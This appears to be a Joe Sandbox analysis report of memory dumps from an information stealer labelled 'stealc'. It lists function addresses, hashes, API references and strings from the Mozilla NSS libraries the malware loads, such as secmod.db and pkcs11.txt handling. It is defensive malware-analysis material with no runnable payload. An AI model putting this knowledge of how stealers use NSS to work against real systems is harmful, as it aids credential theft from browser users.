Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 86d4c60fadb859d1121afd766274d8a73e82c1d3eebf1f54ffbcbf5c3c90d1e6
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 88D16B63B4555A4BFB1848FD8CA13EA77978743378F680329D9218FBE5E61AC943C341

Function 6C94AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af56b558cf1b06b080a2560eb44a8a7eed061281bc8bc5e73efc56ca3dd4ba53
Instruction ID: da81da2190453457457540a41efabb3d0d382168496c0915d00c0adcd30b20e9
Opcode Fuzzy Hash: af56b558cf1b06b080a2560eb44a8a7eed061281bc8bc5e73efc56ca3dd4ba53
Instruction Fuzzy Hash: 5EF1CEB1E09656CBDB04CF68D9403AD77B4AB9E309F258239C915D7B44EB70DA51CBC0

Function 6C888EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23385cd5f386cb3e860137ed65ac044af8cee601b4759a3ea3a0d9d8a91daa8a
Instruction ID: a44a66aef4d750bdc01cc1c2b7a86c9e12425f9e6a52507040a2366728cc3016
Opcode Fuzzy Hash: 23385cd5f386cb3e860137ed65ac044af8cee601b4759a3ea3a0d9d8a91daa8a
Instruction Fuzzy Hash: E1112732A062058FD724DF18E984B5AB3B5FF4131CF184A6AD8058FE41C375D882C7D5

Function 6C960C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 157f6538a36853e839e68eebd254c0824208f01213f91c99a875c538810eb329
Instruction ID: 55390399a9ef1c51681494eed2cc216b35b667116a9c49e98f1436e1387bc763
Opcode Fuzzy Hash: 157f6538a36853e839e68eebd254c0824208f01213f91c99a875c538810eb329
Instruction Fuzzy Hash: B711C174708345CFDB10DF19D8C066A77A5FF85368F148479D8198BB41DB35E806CBA4

Function 6C960D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 22fe1ad0794ad6ff051dad5d2d34942398bf6c59dc9d0825b341729d6783746f
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: FEE0923A202254A7EB148E0AC4A0AAD735DDF81619FB4917DCC5D9FE41D733F8038785

Function 6C8F5DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C8F5E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C8F5E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C8F5E5C
free.MOZGLUE(00000000), ref: 6C8F5E7E
free.MOZGLUE(00000000), ref: 6C8F5E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6C8F5EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C8F5EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C8F5ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C8F5EF0
free.MOZGLUE(00000000), ref: 6C8F5F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C8F5F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C8F5F5B
free.MOZGLUE(00000000), ref: 6C8F5F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C8F5FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C8F5FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C8F5FC4
free.MOZGLUE(00000000), ref: 6C8F5FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C8F5FE9
free.MOZGLUE(00000000), ref: 6C8F5FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C8F600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8F6027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C8F605A
PR_smprintf.NSS3(6C9CAAF9,00000000), ref: 6C8F606A
free.MOZGLUE(00000000), ref: 6C8F607C
free.MOZGLUE(00000000), ref: 6C8F609A
free.MOZGLUE(00000000), ref: 6C8F60B2
free.MOZGLUE(?), ref: 6C8F60CE

Strings

noModDB, xrefs: 6C8F5EEA
pkcs11.txt, xrefs: 6C8F5F47, 6C8F5F7C, 6C8F603A, 6C8F6053
flags, xrefs: 6C8F5E3A, 6C8F5EC6, 6C8F5F30
forceSecmodChoice, xrefs: 6C8F5F55
secmod=, xrefs: 6C8F5FB1
configDir=, xrefs: 6C8F5F9D
readOnly, xrefs: 6C8F5E56
%s/%s, xrefs: 6C8F6055
secmod.db, xrefs: 6C8F5EA0

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: b30f5c2f28d6c18a78a8e35d9513d2719e690f923f4fafa1fa1a7a6d1a1d0ae2
Instruction ID: 60322ebca0f0a640679eea5cd4d9ff8fc92d8542c19eda71cf007a44736db1df
Opcode Fuzzy Hash: b30f5c2f28d6c18a78a8e35d9513d2719e690f923f4fafa1fa1a7a6d1a1d0ae2
Instruction Fuzzy Hash: 3191E6F4A043455BEF208F249E81B9A3BA49F553CCF184960EC75ABB42E731D916C7B2

Function 6C881D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6C881DA3

Part of subcall function 6C9598D0: calloc.MOZGLUE(00000001,00000084,6C880936,00000001,?,6C88102C), ref: 6C9598E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C881DB2

Part of subcall function 6C881240: TlsGetValue.KERNEL32(00000040,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881267
Part of subcall function 6C881240: EnterCriticalSection.KERNEL32(?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C88127C
Part of subcall function 6C881240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C881291
Part of subcall function 6C881240: PR_Unlock.NSS3(?,?,?,?,6C88116C,NSPR_LOG_MODULES), ref: 6C8812A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C881DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C881E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C881EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C881ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C881EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C881F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C881F34
PR_SetLogBuffering.NSS3(00004000), ref: 6C881F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C881F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C881F83
PR_SetLogFile.NSS3(00000000), ref: 6C881FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C881FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6C881FCB
free.MOZGLUE(00000000), ref: 6C881FD2

Strings

bufsize, xrefs: 6C881E9B
sync, xrefs: 6C881E46
all, xrefs: 6C881F0E
Unable to create nspr log file '%s', xrefs: 6C881FB3
append, xrefs: 6C881EE6
, %n, xrefs: 6C881E6B
NSPR_LOG_MODULES, xrefs: 6C881DAD
timestamp, xrefs: 6C881EC4
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6C881E27
NSPR_LOG_FILE, xrefs: 6C881F69

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: d1768627f9a00ccfb232dd85673608df6fc7277e876f97f3b4bda2ef69585c37
Instruction ID: 07adf83f0376d960de75d23d903f581d58ae8b978ede84f3fe2ac34d8142da58
Opcode Fuzzy Hash: d1768627f9a00ccfb232dd85673608df6fc7277e876f97f3b4bda2ef69585c37
Instruction Fuzzy Hash: 8251A9B1E052099BDF10DBE5DE44B9E7BB4AF15309F180928E826DBE40FB71E518CB91

Function 6C966E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C81CA30: EnterCriticalSection.KERNEL32(?,?,?,6C87F9C9,?,6C87F4DA,6C87F9C9,?,?,6C84369A), ref: 6C81CA7A
Part of subcall function 6C81CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C81CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C82BE66), ref: 6C966E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C82BE66), ref: 6C966E98
sqlite3_snprintf.NSS3(?,00000000,6C9CAAF9,?,?,?,?,?,?,6C82BE66), ref: 6C966EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C82BE66), ref: 6C966ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C82BE66), ref: 6C966EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C82BE66), ref: 6C966F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C82BE66), ref: 6C966F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C82BE66), ref: 6C966F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C82BE66), ref: 6C966FA6
sqlite3_snprintf.NSS3(?,00000000,6C9CAAF9,00000000,?,?,?,?,?,?,?,6C82BE66), ref: 6C966FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C82BE66), ref: 6C966FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C82BE66), ref: 6C966FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C82BE66), ref: 6C967014
sqlite3_free.NSS3(00000000,?,?,?,?,6C82BE66), ref: 6C96701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C82BE66), ref: 6C967030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C82BE66), ref: 6C96705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C82BE66), ref: 6C967079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C82BE66), ref: 6C967097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C82BE66), ref: 6C9670A0

Strings

winGetTempname2, xrefs: 6C9670C4
winGetTempname4, xrefs: 6C967046
winGetTempname5, xrefs: 6C967071
mz_etilqs_, xrefs: 6C966F18
winGetTempname1, xrefs: 6C96708F

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: 63eea5ab2f79a3f7410cb59498ed504f5bf39215f880ed07c96232ae6d128430
Instruction ID: d6d9a41c44feeb988c50b42f8530428506a611e77ebec4bd8a1aba5dd772a707
Opcode Fuzzy Hash: 63eea5ab2f79a3f7410cb59498ed504f5bf39215f880ed07c96232ae6d128430
Instruction Fuzzy Hash: 79518BB1A0411167F71196399C55FBB366A8FA2308F144A38E81197FC2FB35E51EC2E3

Function 6C8F4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4C5B
PR_smprintf.NSS3(6C9CAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8F4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8F4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8F4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C8E4F51,00000000), ref: 6C8F4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C8F4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C8F4DA2
free.MOZGLUE(?), ref: 6C8F4DB9
free.MOZGLUE(00000000), ref: 6C8F4DCF

Strings

0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C8F4D9D
timeout, xrefs: 6C8F4C91
0x%08lx=[%s %s], xrefs: 6C8F4D80
%s,%s, xrefs: 6C8F4C4B
any, xrefs: 6C8F4C96
ootT, xrefs: 6C8F4D1A
slotFlags, xrefs: 6C8F4D34
rootFlags, xrefs: 6C8F4D47
rust, xrefs: 6C8F4D22
every, xrefs: 6C8F4CA1

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 202b2edafcd0c94a0342ac8fd48724ca0dfb5e9a57def9992638886ce651b600
Instruction ID: 22b5c95689ca2cb48c18e751280308be79fc511dee451d993031a5f574da5096
Opcode Fuzzy Hash: 202b2edafcd0c94a0342ac8fd48724ca0dfb5e9a57def9992638886ce651b600
Instruction Fuzzy Hash: 9941ACB19001416BEB326F189E40ABA3A75AFD2389F194535E8264B702E735D926C7F3

Function 6C89DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C89DDDE

Part of subcall function 6C8F0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8987ED,00000800,6C88EF74,00000000), ref: 6C8F1000
Part of subcall function 6C8F0FF0: PR_NewLock.NSS3(?,00000800,6C88EF74,00000000), ref: 6C8F1016
Part of subcall function 6C8F0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8987ED,00000008,?,00000800,6C88EF74,00000000), ref: 6C8F102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C89DDF5

Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C89DE34
PR_Now.NSS3 ref: 6C89DE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C89DE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C89DEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C89DEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C89DED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6C89DEF0
PR_smprintf.NSS3(6C9CAAF9,(NULL) (Validity Unknown)), ref: 6C89DF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C89DF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C89DF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C89DF33
free.MOZGLUE(00000000), ref: 6C89DF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C89DF4B
free.MOZGLUE(00000000), ref: 6C89DF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C89DF8E

Strings

%s%s, xrefs: 6C89DEEB
(NULL) (Validity Unknown), xrefs: 6C89DEFA
{???}, xrefs: 6C89DE8B

Memory Dump Source

Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true

Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: 632bc001d620802e8c8f6abf4069d2f242b124c8c44ebba127e2fb645759c3b2
Instruction ID: 74b5f3386c4dd7c6c7db2a431bba8626008f633eac715be3de9dc4ab093dbd12
Opcode Fuzzy Hash: 632bc001d620802e8c8f6abf4069d2f242b124c8c44ebba127e2fb645759c3b2
Instruction Fuzzy Hash: 1451F7B1E001055BDB20DF698D41AAF7AB4AF95398F144839E809EBB00E731D915CBF6

Function 6C8D2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C8D2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C8D2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C8D2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C8D2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C8A4F1C,?,-00000001,00000000,?), ref: 6C8D2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C8A4F1C,?,-00000001,00000000), ref: 6C8D2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C8D2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C8D2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C8D2EF8
PR_Unlock.NSS3(?), ref: 6C8D2F62
TlsGetValue.KERNEL32 ref: 6C8D2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C8D2F9E
PR_Unlock.NSS3(?), ref: 6C8D2FCA
TlsGetValue.KERNEL32 ref: 6C8D301A
EnterCriticalSection.KERNEL32(?), ref: 6C8D302E
PR_Unlock.NSS3(?), ref: 6C8D3066
PR_SetError.NSS3(00000000,00000000), ref: 6C8D3085
PR_Unlock.NSS3(?), ref: 6C8D30EC
TlsGetValue.KERNEL32 ref: 6C8D310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C8D3124
PR_Unlock.NSS3(?), ref: 6C8D314C

Part of subcall function 6C8B9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C8E379E,?,6C8B9568,00000000,?,6C8E379E,?,00000001,?), ref: 6C8B918D
Part of subcall function 6C8B9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C8E379E,?,6C8B9568,00000000,?,6C8E379E,?,00000001,?), ref: 6C8B91A0

Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807AD
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807CD
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C81204A), ref: 6C8807D6
Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C81204A), ref: 6C8807E4
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,6C81204A), ref: 6C880864
Part of subcall function 6C8807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C880880
Part of subcall function 6C8807A0: TlsSetValue.KERNEL32(00000000,?,?,6C81204A), ref: 6C8808CB
Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808D7
Part of subcall function 6C8807A0: TlsGetValue.KERNEL32(?,?,6C81204A), ref: 6C8808FB

PR_SetError.NSS3(00000000,00000000), ref: 6C8D316D

Memory Dump Source

